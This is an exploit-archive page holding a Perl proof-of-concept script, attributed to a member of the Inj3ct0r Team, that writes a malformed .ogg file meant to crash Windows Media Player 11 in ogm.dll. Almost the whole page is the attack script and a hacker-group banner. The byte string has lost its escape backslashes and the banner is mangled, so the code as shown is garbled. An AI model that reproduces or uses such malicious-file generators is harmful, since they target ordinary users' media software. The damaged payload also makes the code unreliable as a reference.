Home / exploits Windows Media Player 11 .ogg Proof Of Concept
Posted on 19 April 2011
#!/usr/bin/perl sub logo { print STDERR << "EOF"; 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : 1337day.com 0 1 [+] Support e-mail : submit[at]1337day.com 1 0 0 1 ######################################### 1 0 I'm KedAns-Dz member from Inj3ct0r Team 1 1 ######################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 EOF } # --------- # Windows Media Player 11 (.ogg) Proof Of Concept Exploit # Author : KedAns-Dz <ked-h@hotmail.com || ked-h@exploit-id.com> # special thanks to : Inj3ct0r Team + exploit-id Team # --------- # Tested in Windows XP sp3 France # Creating The Bad File .OGG And => Bo0M ! # Stack Fram : ogm.dll ! 02B62026 () ! # PoC : 0x02B62026 | MOV | ecx,dword ptr [eax] my $PoC = "x4fx67x67x53x00x02x00x00x00x00x00x00x00x00xb7x7a". "x00x00x00x00x00x00x73x6fx69x92x01x1ex01x76x6fx72". "x62x69x73x00x00x00x00x02x80xbbx00x00x00x00x00x00". "x00x00x00x00x00x00xbbx01x4fx67x67x53x00x00x00x00". "x00x00x00x00x00x00xb7x7ax00x00x01x00x00x00"; open (FILE,">> KedAns.ogg"); # Bad File Here print FILE $PoC; close (FILE); # KedAns-Dz | [D] HaCkerS-StreeT-Team [Z] |!| http://twitter.com/kedans
